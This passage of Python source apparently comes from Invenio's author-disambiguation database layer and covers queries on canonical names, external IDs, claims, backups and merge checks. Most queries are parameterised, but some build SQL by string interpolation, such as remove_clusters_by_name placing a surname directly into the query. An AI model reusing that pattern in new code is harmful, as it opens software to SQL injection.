('canonical_name', pid, newcname))
run_sql("""insert into aidPERSONIDDATA
(personid, tag, data)
values (%s, %s, %s)""",
(pid, 'canonical_name', newcname))
logger.update_status_final("Changing canonical names finished.")
def _delete_from_aidpersoniddata_where(pid=None, tag=None, data=None, opt1=None, opt2=None, opt3=None):
'''
Deletes the records from aidPERSONIDDATA with the given attributes. If no
parameters are given it deletes all records.
@param pid: author identifier
@type pid: int
@param tag: data tag
@type tag: str
@param data: data tag value
@type data: str
@param opt1: opt1
@type opt1: int
@param opt2: opt2
@type opt2: int
@param opt3: opt3
@type opt3: str
'''
conditions = list()
add_condition = conditions.append
args = list()
add_arg = args.append
if pid is not None:
add_condition('personid=%s')
add_arg(pid)
if tag is not None:
add_condition('tag=%s')
add_arg(str(tag))
if data is not None:
add_condition('data=%s')
add_arg(data)
if opt1 is not None:
add_condition('opt1=%s')
add_arg(opt1)
if opt2 is not None:
add_condition('opt2=%s')
add_arg(opt2)
if opt3 is not None:
add_condition('opt3=%s')
add_arg(opt3)
if not conditions:
return
conditions_str = " and ".join(conditions)
query = ('delete from aidPERSONIDDATA '
'where %s') % conditions_str
run_sql(query, tuple(args))
# ********** getters **********#
def get_all_author_data_of_author(pid):
'''
@param pid: author identifier
@type pid: int
@return: records ((data, opt1, opt2, opt3, tag),)
@rtype: tuple ((str, int, int, str, str),)
'''
return _select_from_aidpersoniddata_where(select=['personid', 'tag'], pid=pid)
def get_author_data(pid, tag): # get_personid_row
'''
Gets all the records associated to the specified author and tag.
@param pid: author identifier
@type pid: int
@param tag: data tag
@type tag: str
@return: records ((data, opt1, opt2, opt3, tag),)
@rtype: tuple ((str, int, int, str, str),)
'''
return _select_from_aidpersoniddata_where(select=['data', 'opt1', 'opt2', 'opt3', 'tag'], pid=pid, tag=tag)
def get_canonical_name_of_author(pid): # get_canonical_id_from_personid - get_canonical_names_by_pid
'''
Gets the canonical name of the given author.
@param pid: author identifier
@type pid: int
@return: canonical name
@rtype: tuple ((str),)
'''
return _select_from_aidpersoniddata_where(select=['data'], pid=pid, tag='canonical_name')
def get_pid_to_canonical_name_map():
"""
Generate a dictionary which maps person ids to canonical names
"""
values = run_sql("select personid, data from aidPERSONIDDATA where tag='canonical_name'")
return dict(values)
def get_uid_of_author(pid): # get_uid_from_personid
'''
Gets the user identifier associated with the specified author otherwise
None.
@param pid: author identifier
@type pid: int
@return: user identifier
@rtype: str
'''
uid = _select_from_aidpersoniddata_where(select=['data'], tag='uid', pid=pid)
if uid:
return uid[0][0]
return None
def get_external_ids_of_author(pid): # get_personiID_external_ids
'''
Gets a mapping which associates an external system (e.g. Inspire) with the
identifiers that the given author carries in that system.
@param pid: author identifier
@type pid: int
@return: mapping {ext_system: [ext_id,]}
@rtype: dict {str: [str,]}
'''
tags_extids = run_sql("""select tag, data
from aidPERSONIDDATA
where personid=%s
and tag like %s""",
(pid, 'extid:%%'))
ext_ids = defaultdict(list)
for tag, ext_id in tags_extids:
ext_sys = tag.split(':')[1]
ext_ids[ext_sys].append(ext_id)
return ext_ids
def get_internal_user_id_of_author(pid):
"""
Gets user id (current and eventual old ones) associated to an author.
"""
old_ids = run_sql("select data from aidPERSONIDDATA where tag like 'uid_old' and personid=%s", (pid,))
ids = get_user_id_of_author(pid)
try:
ids = int(ids[0][0])
except IndexError:
ids = None
try:
old_ids = [x[0] for x in old_ids]
except IndexError:
old_ids = list()
return ids, old_ids
def get_arxiv_papers_of_author(pid):
'''
Gets the arxiv papers of the specified author. If no stored record is
found, None is returned.
@param pid: author identifier
@type pid: int
@return: arxiv paper identifiers
@rtype: list [str,]
'''
arxiv_papers = run_sql("""select datablob
from aidPERSONIDDATA
where tag=%s
and personid=%s""",
('arxiv_papers', pid))
if not arxiv_papers:
return None
arxiv_papers = deserialize(arxiv_papers[0][0])
return arxiv_papers
def get_request_tickets_for_author(pid, tid=None): # get_request_ticket
'''
Gets the request tickets for the given author. If ticket identifier is
specified it returns only that one.
@param pid: author identifier
@type pid: int
@param tid: ticket identifier
@type tid: int
@returns: request tickets [[[(tag, value)], tid],]
@rtype: list [[[(str, str)], int],]
'''
try:
request_tickets = run_sql("""select datablob
from aidPERSONIDDATA
where personid=%s
and tag=%s""",
(pid, 'request_tickets'))
request_tickets = list(deserialize(request_tickets[0][0]))
except IndexError:
return list()
if tid is None:
return request_tickets
for request_ticket in request_tickets:
if request_ticket['tid'] == tid:
return [request_ticket]
return list()
def get_authors_by_canonical_name_regexp(cname_regexp): # get_personids_by_canonical_name
'''
Gets authors whose canonical name matches the regular expression pattern.
@param cname_regexp: SQL regular expression
@type cname_regexp: str
@return: author identifiers and their canonical name ((pid, canonical_name),)
@rtype: tuple ((int, str),)
'''
return run_sql("""select personid, data
from aidPERSONIDDATA
where tag=%s
and data like %s""",
('canonical_name', cname_regexp))
def get_author_by_canonical_name(cname): # get_person_id_from_canonical_id
'''
Gets the author who carries the given canonical name.
@param cname: canonical name
@type cname: str
@return: author identifier ((pid),)
@rtype: tuple ((int),)
'''
return _select_from_aidpersoniddata_where(select=['personid'], tag='canonical_name', data=cname)
def get_author_by_uid(uid): # get_personid_from_uid
'''
Gets the author associated with the specified user identifier otherwise it
returns None.
@param uid: user identifier
@type uid: int
@return: author identifier
@rtype: int
'''
pid = _select_from_aidpersoniddata_where(select=['personid'], tag='uid', data=str(uid))
if not pid:
return None
return int(pid[0][0])
def get_author_by_external_id(ext_id, ext_sys=None): # get_person_with_extid
'''
Gets the authors who carry the given external identifier. If 'ext_sys' is
specified, it constraints the search only for that external system.
@param ext_id: external identifier
@type ext_id: str
@param ext_sys: external system
@type ext_sys: str
@return: author identifiers set(pid,)
@rtype: set set(int,)
'''
if ext_sys is None:
pids = _select_from_aidpersoniddata_where(select=['personid'], data=ext_id)
else:
tag = 'extid:%s' % ext_sys
pids = _select_from_aidpersoniddata_where(select=['personid'], data=ext_id, tag=tag)
return set(pids)
def get_authors_with_open_tickets(): # get_persons_with_open_tickets_list
'''
Gets all the authors who have open tickets.
@return: author identifiers and count of tickets ((personid, ticket_count),)
@rtype: tuple ((int, int),)
'''
return run_sql("""select personid, opt1
from aidPERSONIDDATA
where tag=%s""",
('request_tickets',))
def get_author_data_associations(table_name="`aidPERSONIDDATA`"): # get_full_personid_data
'''
Gets all author-data associations (from aidPERSONIDDATA table or any other
table with the same structure).
@param table_name: name of the table with the author-data associations
@type table_name: str
@return: author-data associations ((pid, tag, data, opt1, opt2, opt3),)
@rtype: tuple ((int, str, str, int, int, str),)
'''
return run_sql('select personid, tag, data, opt1, opt2, opt3 '
'from %s' % table_name)
def get_inspire_id_of_author(pid): ### get_inspire_ids_by_pids
'''
Gets the external identifier of Inspire system for the given author.
@param pid: author identifier
@type pid: int
@return: Inspire external identifier
@rtype: tuple ((str),)
'''
result = _select_from_aidpersoniddata_where(select=['data'], pid=pid, tag='extid:INSPIREID')
if result:
if len(result) > 1:
from invenio.bibauthorid_hoover_exceptions import MultipleIdsOnSingleAuthorException
raise MultipleIdsOnSingleAuthorException('Conflict in aidPERSONIDDATA', pid, 'INSPIREID', result)
return result[0][0]
return tuple()
def get_orcid_id_of_author(pid): # get_orcids_by_pids
'''
Gets the external identifier of ORCID system for the given author.
@param pid: author identifier
@type pid: int
@return: ORCID external identifier
@rtype: tuple ((str),)
'''
return _select_from_aidpersoniddata_where(select=['data'], pid=pid, tag='extid:ORCID')
def create_new_author_by_uid(uid=-1, uid_is_owner=False): # create_new_person
'''
Creates a new author and associates him with the given user identifier. If
the 'uid_is_owner' flag is enabled the author will hold the user identifier
as owner, otherwise as creator.
@param uid: user identifier
@type uid: int
@param uid_is_owner: the author will hold the user identifier as owner, otherwise as creator
@type uid_is_owner: bool
@return: author identifier
@rtype: int
'''
pid_with_uid = _select_from_aidpersoniddata_where(select=['personid'], tag='uid', data=uid)
if pid_with_uid and uid_is_owner:
return pid_with_uid[0][0]
pid = get_free_author_id()
if uid_is_owner:
add_author_data(pid, 'uid', str(uid))
else:
add_author_data(pid, 'user-created', str(uid))
return pid
def user_can_modify_data_of_author(uid, pid): # user_can_modify_data
'''
Examines if the specified user can modify data of the given author.
@param uid: user identifier
@type uid: int
@param pid: author identifier
@type pid: int
@return: user can modify data
@rtype: bool
'''
uid_of_author = _select_from_aidpersoniddata_where(select=['data'], tag='uid', pid=pid)
rights = bconfig.CLAIMPAPER_CHANGE_OTHERS_DATA
if uid_of_author and str(uid) == str(uid_of_author[0][0]):
rights = bconfig.CLAIMPAPER_CHANGE_OWN_DATA
return acc_authorize_action(uid, rights)[0] == 0
def _select_from_aidpersoniddata_where(select=None, pid=None, tag=None, data=None, opt1=None, opt2=None, opt3=None):
'''
Selects the given fields from the records of aidPERSONIDDATA table
with the specified attributes. If no parameters are given it returns all
records.
@param select: fields to select
@type select: list [str,]
@param pid: author identifier
@type pid: int
@param tag: data tag
@type tag: str
@param data: data tag value
@type data: str
@param opt1: opt1
@type opt1: int
@param opt2: opt2
@type opt2: int
@param opt3: opt3
@type opt3: str
@return: given fields of the records with the specified attributes
@rtype: tuple
'''
if not select:
return None
conditions = list()
add_condition = conditions.append
args = list()
add_arg = args.append
add_condition('True')
if pid is not None:
add_condition('personid=%s')
add_arg(pid)
if tag is not None:
add_condition('tag=%s')
add_arg(tag)
if data is not None:
add_condition('data=%s')
add_arg(data)
if opt1 is not None:
add_condition('opt1=%s')
add_arg(opt1)
if opt2 is not None:
add_condition('opt2=%s')
add_arg(opt2)
if opt3 is not None:
add_condition('opt3=%s')
add_arg(opt3)
select_fields_str = ", ".join(select)
conditions_str = " and ".join(conditions)
query = """select %s
from aidPERSONIDDATA
where %s""" % (select_fields_str, conditions_str)
return run_sql(query, tuple(args))
#
#
# both tables ###
#
#
# ********** setters **********#
def empty_authors_exist(printer, repair=False): # check_empty_personids
'''
It examines if there are empty authors (that is authors with no papers or
other defined data) and deletes them if specified.
@param printer: for log keeping
@type printer: func
@param repair: delete empty authors
@type repair: bool
@return: empty authors are found
@rtype: bool
'''
empty_authors_found = False
empty_pids = remove_empty_authors(remove=repair)
if empty_pids:
empty_authors_found = True
for pid in empty_pids:
printer("Personid %d has no papers and nothing else than canonical_name." % pid)
if repair:
printer("Deleting empty person %s." % pid)
return empty_authors_found
def remove_empty_authors(remove=True): # delete_empty_persons
'''
Gets all empty authors (that is authors with no papers or other defined
data) and by default deletes all data associated with them, except if
specified differently.
@param remove: delete empty authors
@type remove: bool
@return: empty author identifiers set(pid,)
@rtype: set set(int,)
'''
pids = run_sql("select distinct(personid) from aidPERSONIDPAPERS")
pids_with_papers = set(pid[0] for pid in pids)
pids_tags = _select_from_aidpersoniddata_where(select=['personid', 'tag'])
pids_with_data = set(pid for pid, tag in pids_tags)
#if a pid has another tag besides canonical name
not_empty_pids = set(pid for pid, tag in pids_tags if tag not in bconfig.NON_EMPTY_PERSON_TAGS)
empty_pids = pids_with_data - (pids_with_papers | not_empty_pids)
if empty_pids and remove:
run_sql("""delete from aidPERSONIDDATA
where personid in %s"""
% _get_sqlstr_from_set(empty_pids))
return empty_pids
# bibauthorid_maintenance personid update private methods
def update_canonical_names_of_authors(pids=None, overwrite=False, suggested='', overwrite_not_claimed_only=False): # update_personID_canonical_names
'''
Updates the canonical names for the given authors. If no authors are
specified it does the updating for all authors. If 'overwrite' flag is
enabled it updates even authors who carry a canonical name. If
'overwrite_not_claimed_only' flag is enabled it updates only authors who do
not have any claim.
@param pids: author identifiers
@type pids: list
@param overwrite: update even authors who carry a canonical name
@type overwrite: bool
@param suggested: suggested canonical name
@type suggested: str
@param overwrite_not_claimed_only: update authors who do not have any claim
@type overwrite_not_claimed_only: bool
'''
if pids is None:
pids = set([pid[0] for pid in _select_from_aidpersonidpapers_where(select=['personid'])])
if not overwrite:
pids_with_cname = set([x[0]
for x in _select_from_aidpersoniddata_where(select=['personid'], tag='canonical_name')])
pids = pids - pids_with_cname
for i, pid in enumerate(pids):
logger.update_status(float(i) / float(len(pids)), "Updating canonical_names...")
if overwrite_not_claimed_only:
has_claims = bool(_select_from_aidpersonidpapers_where(select=['*'], pid=pid, flag=2))
if has_claims:
continue
current_cname = _select_from_aidpersoniddata_where(select=['data'], pid=pid, tag='canonical_name')
if overwrite or not current_cname:
if current_cname:
_delete_from_aidpersoniddata_where(pid=pid, tag='canonical_name')
names_count = get_names_count_of_author(pid)
names_count = sorted(names_count, key=itemgetter(1), reverse=True)
if not names_count and not suggested:
continue
canonical_name = suggested
if not suggested:
canonical_name = create_canonical_name(names_count[0][0])
taken_cnames = run_sql("""select data from aidPERSONIDDATA
where tag=%s
and data like %s""",
('canonical_name', canonical_name + '%'))
taken_cnames = set([cname[0].lower() for cname in taken_cnames])
for i in count(1):
current_try = canonical_name + '.' + str(i)
if current_try.lower() not in taken_cnames:
canonical_name = current_try
break
run_sql("""insert into aidPERSONIDDATA
(personid, tag, data)
values (%s, %s, %s)""",
(pid, 'canonical_name', canonical_name))
logger.update_status_final("Updating canonical_names finished.")
# ********** getters **********#
def get_free_author_ids(): # get_free_pids
'''
Gets unused author identifiers (it fills the holes).
@return: free author identifiers
@rtype: iterator (int, )
'''
all_pids = frozenset(pid[0] for pid in chain(
_select_from_aidpersonidpapers_where(select=['personid']),
_select_from_aidpersoniddata_where(select=['personid'])))
return ifilter(lambda x: x not in all_pids, count(1))
def get_free_author_id(): # get_new_personid
'''
Gets a free author identifier.
@return: free author identifier
@rtype: int
'''
max_pids = [_select_from_aidpersonidpapers_where(select=['max(personid)']),
_select_from_aidpersoniddata_where(select=['max(personid)'])]
max_pids = tuple(int(pid[0][0]) for pid in max_pids if pid and pid[0][0])
free_pid = 1
if len(max_pids) == 2:
free_pid = max(*max_pids) + 1
elif len(max_pids) == 1:
free_pid = max_pids[0] + 1
return free_pid
def get_existing_authors(with_papers_only=False): # get_existing_personids
'''
Gets existing authors (that is authors who are associated with a paper or
withhold some other data). If 'with_papers_only' flag is enabled it gets
only authors with papers.
@param with_papers_only: only authors with papers
@type with_papers_only: bool
@return: author identifiers set(pid,)
@rtype: set set(int,)
'''
pids_wih_data = set()
if not with_papers_only:
try:
pids_wih_data = set(map(int, zip(*run_sql("select distinct personid from aidPERSONIDDATA"))[0]))
except IndexError:
pids_wih_data = set()
try:
pids_with_papers = set(map(int, zip(*run_sql("select distinct personid from aidPERSONIDPAPERS"))[0]))
except IndexError:
pids_with_papers = set()
return pids_wih_data | pids_with_papers
def get_data_of_papers(recs, with_alt_names=False, with_all_author_papers=False): # get_persons_from_recids
'''
Gets data for the specified papers. Helper for search engine indexing.
For example: get_data_of_papers([1], True, True) returns
({1: [16591L]},
{16591L: {'alternative_names': ['Wong, Yung Chow'],
'canonical_id': 'Y.C.Wong.1',
'person_records': [275304, 1, 51394, 128250, 311629]}})
@param recs: paper identifiers
@type recs: list
@param with_alt_names: include alternative author names
@type with_alt_names: bool
@param with_all_author_papers: include all papers for each author
@type with_all_author_papers: bool
@return: data of the specified papers
@rtype: tuple ({int: [int,]}, {int: {'str': str,}})
'''
paper_authors = dict()
author_papers = dict()
all_pids = set()
for rec in recs:
pids = run_sql("""select personid
from aidPERSONIDPAPERS
where bibrec=%s
and flag > -2""",
(rec,))
pids = set(pid[0] for pid in pids)
paper_authors[rec] = list(pids)
all_pids |= pids
for pid in all_pids:
pid_data = dict()
cname = _select_from_aidpersoniddata_where(select=['data'], pid=pid, tag='canonical_name')
# We can suppose that this author didn't have a chance to get a canonical name yet
# because it was not fully processed by it's creator. Anyway it's safer to try to
# create one before failing miserably.
if not cname:
update_canonical_names_of_authors([pid])
cname = _select_from_aidpersoniddata_where(select=['data'], pid=pid, tag='canonical_name')
# assert len(canonical) == 1
# This condition cannot hold in case claims or update daemons are run in parallel
# with this, as it can happen that an author with papers exists and whose
# canonical name has not been computed yet. Hence, it will be indexed next time,
# so that it learns. Each author should have at most one canonical name, so:
assert len(cname) <= 1, "A person cannot have more than one canonical name"
if len(cname) == 1:
pid_data = {'canonical_id': cname[0][0]}
if with_alt_names:
names = run_sql("""select name
from aidPERSONIDPAPERS
where personid=%s
and flag > -2""",
(pid,))
names = set(name[0] for name in names)
pid_data['alternative_names'] = list(names)
if with_all_author_papers:
recs = run_sql("""select bibrec
from aidPERSONIDPAPERS
where personid=%s
and flag > -2""",
(pid,))
recs = set(rec[0] for rec in recs)
pid_data['person_records'] = list(recs)
author_papers[pid] = pid_data
return (paper_authors, author_papers)
def impaired_canonical_names_exist(printer, repair=False): # check_canonical_names
'''
It examines if there are authors who carry less or more than one canonical
name and repairs them if specified.
@param printer: for log keeping
@type printer: func
@param repair: fix authors with less/more than one canonical name
@type repair: bool
@return: authors with less/more than one canonical name exist
@rtype: bool
'''
impaired_canonical_names_found = False
authors_cnames = _select_from_aidpersoniddata_where(select=['personid', 'data'], tag='canonical_name')
authors_cnames = sorted(authors_cnames, key=itemgetter(0))
author_cnames_count = dict((pid, len(list(cnames))) for pid, cnames in groupby(authors_cnames, key=itemgetter(0)))
to_update = list()
for pid in get_existing_authors():
cnames_count = author_cnames_count.get(pid, 0)
if cnames_count != 1:
if cnames_count == 0:
papers_count = _select_from_aidpersonidpapers_where(select=['count(*)'], pid=pid)[0][0]
if papers_count != 0:
impaired_canonical_names_found = True
printer("Personid %d does not have a canonical name, but has %d papers." % (pid, papers_count))
to_update.append(pid)
else:
impaired_canonical_names_found = True
printer("Personid %d has %d canonical names.", (pid, cnames_count))
to_update.append(pid)
if repair and impaired_canonical_names_found:
printer("Repairing canonical names for pids: %s" % str(to_update))
update_canonical_names_of_authors(to_update, overwrite=True)
return impaired_canonical_names_found
def user_can_modify_paper(uid, sig_str):
'''
Examines if the given user can modify the specified paper attribution. If
the paper is assigned more then one time (from algorithms) consider the
most privileged assignment.
@param uid: user identifier
@type: int
@param sig_str: signature in a string form e.g. '100:7531,9024'
@type sig_str: str
@return: user can modify paper attribution
@rtype: bool
'''
table, ref, rec = _split_signature_string(sig_str)
pid_lcul = run_sql("""select personid, lcul
from aidPERSONIDPAPERS
where bibref_table like %s
and bibref_value=%s
and bibrec=%s
order by lcul
desc limit 0,1""",
(table, ref, rec))
if not pid_lcul:
return ((acc_authorize_action(uid, bconfig.CLAIMPAPER_CLAIM_OWN_PAPERS)[0] == 0) or
(acc_authorize_action(uid, bconfig.CLAIMPAPER_CLAIM_OTHERS_PAPERS)[0] == 0))
min_req_acc_n = int(pid_lcul[0][1])
uid_of_author = run_sql("""select data
from aidPERSONIDDATA
where tag=%s
and personid=%s""",
('uid', str(pid_lcul[0][0])))
req_acc = get_paper_access_right(bconfig.CLAIMPAPER_CLAIM_OWN_PAPERS)
if uid_of_author:
if (str(uid_of_author[0][0]) != str(uid)) and min_req_acc_n > 0:
req_acc = get_paper_access_right(bconfig.CLAIMPAPER_CLAIM_OTHERS_PAPERS)
if min_req_acc_n < req_acc:
min_req_acc_n = req_acc
min_req_acc = get_paper_access_right(min_req_acc_n)
return (acc_authorize_action(uid, min_req_acc)[0] == 0) and (get_paper_access_right(min_req_acc) >= min_req_acc_n)
#
#
# aidPERSONIDDATA or/and aidPERSONIDPAPERS table + some other table ###
#
#
# ********** setters **********#
def back_up_author_paper_associations(): # copy_personids
'''
Copies/Backs-up the author-data and author-paper association tables
(aidPERSONIDDATA, aidPERSONIDPAPERS) to the back-up tables
(aidPERSONIDDATA_copy, aidPERSONIDPAPERS_copy) for later
comparison/restoration.
'''
run_sql('drop table if exists `aidPERSONIDDATA_copy`')
run_sql("""CREATE TABLE `aidPERSONIDDATA_copy` (
`personid` BIGINT( 16 ) UNSIGNED NOT NULL ,
`tag` VARCHAR( 64 ) NOT NULL ,
`data` VARCHAR( 256 ) NULL DEFAULT NULL ,
`datablob` LONGBLOB NULL DEFAULT NULL ,
`opt1` MEDIUMINT( 8 ) NULL DEFAULT NULL ,
`opt2` MEDIUMINT( 8 ) NULL DEFAULT NULL ,
`opt3` VARCHAR( 256 ) NULL DEFAULT NULL ,
`last_updated` TIMESTAMP ON UPDATE CURRENT_TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP ,
INDEX `personid-b` (`personid`) ,
INDEX `tag-b` (`tag`) ,
INDEX `data-b` (`data`) ,
INDEX `opt1` (`opt1`) ,
INDEX `timestamp-b` ( `last_updated` )
) ENGINE = MYISAM DEFAULT CHARSET = utf8""")
run_sql("""insert into `aidPERSONIDDATA_copy`
select *
from `aidPERSONIDDATA`""")
run_sql('drop table if exists `aidPERSONIDPAPERS_copy`')
run_sql("""CREATE TABLE IF NOT EXISTS `aidPERSONIDPAPERS_copy` (
`personid` BIGINT( 16 ) UNSIGNED NOT NULL ,
`bibref_table` ENUM( '100', '700' ) NOT NULL ,
`bibref_value` MEDIUMINT( 8 ) UNSIGNED NOT NULL ,
`bibrec` MEDIUMINT( 8 ) UNSIGNED NOT NULL ,
`name` VARCHAR( 256 ) NOT NULL ,
`m_name` VARCHAR( 256 ) NOT NULL ,
`flag` SMALLINT( 2 ) NOT NULL DEFAULT '0' ,
`lcul` SMALLINT( 2 ) NOT NULL DEFAULT '0' ,
`last_updated` TIMESTAMP ON UPDATE CURRENT_TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP ,
INDEX `personid-b` (`personid`) ,
INDEX `reftable-b` (`bibref_table`) ,
INDEX `refvalue-b` (`bibref_value`) ,
INDEX `rec-b` (`bibrec`) ,
INDEX `name-b` (`name`) ,
INDEX `pn-b` (`personid`, `name`) ,
INDEX `timestamp-b` (`last_updated`) ,
INDEX `flag-b` (`flag`) ,
INDEX `personid-flag-b` (`personid`,`flag`),
INDEX `ptvrf-b` (`personid`, `bibref_table`, `bibref_value`, `bibrec`, `flag`)
) ENGINE = MYISAM DEFAULT CHARSET = utf8""")
run_sql("""insert into `aidPERSONIDPAPERS_copy`
select *
from `aidPERSONIDPAPERS""")
# ********** getters **********#
def get_papers_affected_since(date_from, date_to=None): # personid_get_recids_affected_since
"""
Gets the records whose bibauthorid informations changed between
date_from and date_to (inclusive).
If date_to is None, gets the records whose bibauthorid informations
changed after date_to (inclusive).
@param date_from: the date after which this function will look for
affected records.
@type date_from: datetime.datetime
@param date_to: the date before which this function will look for
affected records. Currently this is not supported and is
ignored. Should be supported in the future.
@type date_to: datetime.datetime or None
@return: affected record ids
@return type: intbitset
"""
recs = run_sql("""select bibrec from aidPERSONIDPAPERS where
last_updated >= %s UNION ALL select bibrec
from aidPERSONIDPAPERS where personid in
(select personid from aidPERSONIDDATA where
last_updated >= %s)""", (date_from, date_from))
return intbitset(recs)
def get_papers_info_of_author(pid, flag, # get_person_papers
show_author_name=False,
show_title=False,
show_rt_status=False,
show_affiliations=False,
show_date=False,
show_experiment=False):
'''
Gets information for the papers that the given author is associated with.
The information which is included depends on the enabled flags.
e.g. get_papers_info_of_author(16591, -2, True, True, True, True, True, True) returns
[{'affiliation': ['Hong Kong U.'],
'authorname': 'Wong, Yung Chow',
'data': '100:1,1',
'date': ('1961',),
'experiment': [],
'flag': 0,
'rt_status': False,
'title': ('Isoclinic N planes in Euclidean 2N space, Clifford parallels in elliptic (2N-1) space, and the Hurwitz matrix equations',) },
...]
@param pid: author identifier
@type pid: int
@param flag: author-paper association status
@type flag: int
@param show_author_name: show author name for each paper
@type show_author_name: bool
@param show_title: show title of each paper
@type show_title: bool
@param show_rt_status: show if there are request tickets for the author
@type show_rt_status: bool
@param show_affiliations: show affiliations
@type show_affiliations: bool
@param show_date: show publication date
@type show_date: bool
@param show_experiment: show the experiment which the paper is associated with
@type show_experiment: bool
@return: information for each paper
@rtype: list [{str: str, str: int, ...}]
'''
select = ['bibref_table', 'bibref_value', 'bibrec', 'flag']
if show_author_name:
select.append('name')
select_fields_str = ", ".join(select)
records = run_sql('select %s ' % select_fields_str +
'from aidPERSONIDPAPERS '
'where personid=%s '
'and flag >= %s', (pid, flag))
# total HACK to speed up claiming for Atlas/CMS authors
use_recstruct = True
if len(records) > 100:
aurecs = [recdata[2] for recdata in records]
aucounts = run_sql('select termlist from idxWORD20R where id_bibrec in (%s)' % ','.join([str(r) for r in aurecs]))
aucounts = sorted([int(deserialize_via_marshal(val[0])[0]) for val in aucounts])
# at least 5 records with over 500 authors
if aucounts[-5] > 500:
use_recstruct = False
def format_record(record, use_recstruct=True):
'''
Gets information for the paper that the record is associated with.
@param record: author-paper association record
@type record: tuple
@return: information for the paper
@rtype: dict {str: str, str: int, ...}
'''
if show_author_name:
table, ref, rec, flag, name = record
else:
table, ref, rec, flag = record
sig_str = "%s:%d,%d" % (table, ref, rec)
record_info = {'data': sig_str,
'flag': flag}
if use_recstruct:
recstruct = get_record(rec)
if show_author_name:
record_info['authorname'] = name
if show_title:
if use_recstruct:
record_info['title'] = (record_get_field_value(recstruct, '245', '', '', 'a'),)
else:
try:
title = get_fieldvalues(rec, '245__a')[0]
except IndexError:
title = ""
record_info['title'] = (title,)
if show_rt_status:
record_info['rt_status'] = False
for request_ticket in request_tickets:
operations = request_ticket['operations']
for action, bibrefrec in operations:
if bibrefrec == sig_str:
record_info['rt_status'] = True
break
if show_affiliations:
tag = '%s__u' % table
record_info['affiliation'] = get_grouped_records((table, ref, rec), tag)[tag]
if show_date:
if use_recstruct:
record_info['date'] = (record_get_field_value(recstruct, '269', '', '', 'c'),)
else:
try:
date = get_fieldvalues(rec, '269__c')[0]
except IndexError:
date = ""
record_info['date'] = (date,)
try:
ead = run_sql("SELECT earliest_date FROM bibrec WHERE id=%s", (rec, ))[0][0]
record_info['earliest_date'] = "{0}-{1:02d}-{2:02d}".format(ead.year, ead.month, ead.day)
except:
# Too bad
pass
if show_experiment:
if use_recstruct:
record_info['experiment'] = (record_get_field_value(recstruct, '693', '', '', 'e'),)
else:
try:
experiment = get_fieldvalues(rec, '693__e')[0]
except IndexError:
experiment = ''
record_info['experiment'] = (experiment,)
return record_info
request_tickets = get_request_tickets_for_author(pid)
return [format_record(record, use_recstruct) for record in records]
def get_names_of_author(pid, sort_by_count=True): # get_person_db_names_count
'''
Gets the names associated to the given author and sorts them (by default)
in descending order of name count.
@param pid: author identifier
@type pid: int
@param sort_by_count: sort in descending order of name count
@type sort_by_count: bool
@return: author names and count of each name [(name, name_count),]
@rtype: list [(str, int),]
'''
bibref = run_sql("""select bibref_table, bibref_value
from aidPERSONIDPAPERS
where personid=%s
and flag > -2""",
(pid,))
bibref_values100 = [value for table, value in bibref if table == '100']
bibref_values700 = [value for table, value in bibref if table == '700']
bibref_values100_count = dict((key, len(list(data))) for key, data in groupby(sorted(bibref_values100)))
bibref_values700_count = dict((key, len(list(data))) for key, data in groupby(sorted(bibref_values700)))
ids_names100 = tuple()
if bibref_values100:
bibref_value100_sqlstr = _get_sqlstr_from_set(bibref_values100)
ids_names100 = run_sql("""select id, value
from bib10x
where id in %s"""
% bibref_value100_sqlstr)
ids_names700 = tuple()
if bibref_values700:
bibref_value700_sqlstr = _get_sqlstr_from_set(bibref_values700)
ids_names700 = run_sql("""select id, value
from bib70x
where id in %s"""
% bibref_value700_sqlstr)
names_count100 = [(name, bibref_values100_count[nid]) for nid, name in ids_names100]
names_count700 = [(name, bibref_values700_count[nid]) for nid, name in ids_names700]
names_count = names_count100 + names_count700
if sort_by_count:
names_count = sorted(names_count, key=itemgetter(1), reverse=True)
return names_count
def get_matchable_name_of_author(pid):
"""
Returns the matchable name currently associated with this person in
aidPERSONIDPAPERS.
@param pid: the person id of the author
@return: The matchable name of the author
"""
query = 'select distinct m_name from aidPERSONIDPAPERS where personid=%s'
return run_sql(query, (pid,))[0][0]
def merger_errors_exist(): # check_merger
'''
It examines if the merger introduced any error to the author-paper
asociations (e.g. loss of claims/signatures, creation of new
claims/signatures). It presumes that copy_personid was called before the
merger.
@return: merger errors are found
@rtype: bool
'''
all_ok = True
old_claims = set(run_sql("""select personid, bibref_table, bibref_value, bibrec, flag
from aidPERSONIDPAPERS_copy
where (flag=-2 or flag=2)"""))
cur_claims = set(run_sql("""select personid, bibref_table, bibref_value, bibrec, flag
from aidPERSONIDPAPERS
where (flag=-2 or flag=2)"""))
errors = ((old_claims - cur_claims, "Some claims were lost during the merge."),
(cur_claims - old_claims, "Some new claims appeared after the merge."))
action = {-2: 'Rejection', 2: 'Claim'}
for claims, message in errors:
if claims:
all_ok = False
logger.log(message)
logger.log("".join(" %s: personid %d %d:%d,%d\n" %
(action[cl[4]], cl[0], int(cl[1]), cl[2], cl[3]) for cl in claims))
old_sigs = set(run_sql("""select bibref_table, bibref_value, bibrec
from aidPERSONIDPAPERS_copy"""))
# where (flag <> -2 and flag <> 2)
cur_sigs = set(run_sql("""select bibref_table, bibref_value, bibrec
from aidPERSONIDPAPERS"""))
# where (flag <> -2 and flag <> 2)
errors = ((old_sigs - cur_sigs, "Some signatures were lost during the merge."),
(cur_sigs - old_sigs, "Some new signatures appeared after the merge."))
for sigs, message in errors:
if sigs:
all_ok = False
logger.log(message)
logger.log("".join(" %s:%d,%d\n" % sig for sig in sigs))
return all_ok
#
#
# aidRESULTS table ###
#
#
# ********** setters **********#
def save_cluster(named_cluster):
'''
Saves a cluster of papers (named after the author surname).
@param named_cluster: named cluster of papers
@type named_cluster: Cluster
'''
name, cluster = named_cluster
for sig in cluster.bibs:
table, ref, rec = sig
run_sql("""insert into aidRESULTS
(personid, bibref_table, bibref_value, bibrec)
values (%s, %s, %s, %s)""",
(name, str(table), ref, rec))
def remove_clusters_by_name(surname): # remove_result_cluster
'''
Deletes all clusters which belong to authors who carry the specified
surname.
@param surname: author surname
@type surname: str
'''
run_sql("""delete from aidRESULTS
where personid like '%s.%%'"""
% surname)
def empty_tortoise_results_table(): # empty_results_table
'''
Truncates the disambiguation algorithm results table.
'''
_truncate_table('aidRESULTS')
# ********** getters **********#
def get_clusters_by_surname(surname): # get_lastname_results
'''
Gets all the disambiguation algorithm result records associated to the
